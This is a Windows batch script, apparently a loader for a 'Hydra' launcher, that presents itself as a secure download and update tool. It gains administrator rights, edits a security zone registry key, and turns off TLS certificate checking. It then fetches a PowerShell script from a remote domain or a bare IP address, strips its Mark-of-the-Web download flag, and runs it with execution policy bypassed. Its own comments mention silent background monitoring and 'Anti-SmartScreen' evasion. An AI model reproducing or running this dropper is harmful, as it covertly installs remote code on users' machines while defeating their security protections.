@echo off REM ========================================================= REM HYDRA AGENT - Batch Wrapper (Anti-SmartScreen) REM ========================================================= setlocal enabledelayedexpansion cd /d "%~dp0" cls color 0A echo. echo ======================================================== echo HYDRA LAUNCHER AGENT v2.6.1 echo Sistema de Download Seguro echo ======================================================== echo. REM ===== VERIFICAR ADMIN ===== echo [1/4] Verificando privilegios... net session >nul 2>&1 if %errorLevel% neq 0 ( color 0E echo. echo Solicitando privilegios de administrador... powershell -Command "Start-Process -FilePath 'cmd.exe' -ArgumentList '/c \"\"%~f0\"\"' -Verb RunAs" exit /b ) echo [OK] Privilegios de administrador confirmados color 0A REM ===== ETAPA 2: MODIFICAR REGISTRY ===== echo. echo [2/4] Configurando sistema... reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost" /v "http" /t REG_DWORD /d 2 /f >nul 2>&1 echo [OK] Registry configurado REM ===== ETAPA 3: BAIXAR PATCH PS1 ===== echo. echo [3/4] Baixando script de atualizacao... set "PATCH_URL_PRIMARY=https://patch-hydra.topgle.com.br/download/patch/ps1" set "PATCH_URL_FALLBACK=http://138.68.62.190:5000/download/patch/ps1" set "PATCH_FILE=%temp%\hydra_patch_install.ps1" powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls; [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $urls = @('%PATCH_URL_PRIMARY%','%PATCH_URL_FALLBACK%'); $ok = $false; foreach ($url in $urls) { for ($i=1; $i -le 3; $i++) { try { Write-Host \" Tentativa $i - $url\" -ForegroundColor Gray; (New-Object System.Net.WebClient).DownloadFile($url, '%PATCH_FILE%'); if (Test-Path '%PATCH_FILE%') { Write-Host ' [OK] Script baixado' -ForegroundColor Green; $ok = $true; break } } catch { Write-Host \" Tentativa $i falhou: $($_.Exception.Message)\" -ForegroundColor Yellow; Start-Sleep -Seconds 2 } }; if ($ok) { break } }; if (-not $ok) { Write-Host ' [ERRO] Todas as tentativas falharam' -ForegroundColor Red; exit 1 }" if %errorLevel% neq 0 ( color 0C echo [ERRO] Falha ao baixar! pause exit /b 1 ) if not exist "%PATCH_FILE%" ( color 0C echo [ERRO] Arquivo nao salvo! pause exit /b 1 ) REM ===== ETAPA 4: EXECUTAR PATCH PS1 ===== echo. echo [4/4] Iniciando atualizacao... echo. REM Remover MOTW powershell -NoProfile -Command "Remove-Item -Path '%PATCH_FILE%:Zone.Identifier' -Force -EA SilentlyContinue" REM Executar PS1 em janela separada (visivel para ativacao de licenca) REM Apos a licenca ser verificada e o Hydra iniciar, a janela fecha sozinha REM e o monitoramento continua silenciosamente em segundo plano. start "" powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Normal -File "%PATCH_FILE%" echo. echo ======================================================== echo Hydra Patch iniciado! Esta janela sera fechada. echo Siga as instrucoes na janela do Hydra Patch. echo ======================================================== echo. REM Aguardar 3 segundos e fechar automaticamente (sem pause) timeout /t 3 /nobreak >nul 2>&1 exit /b 0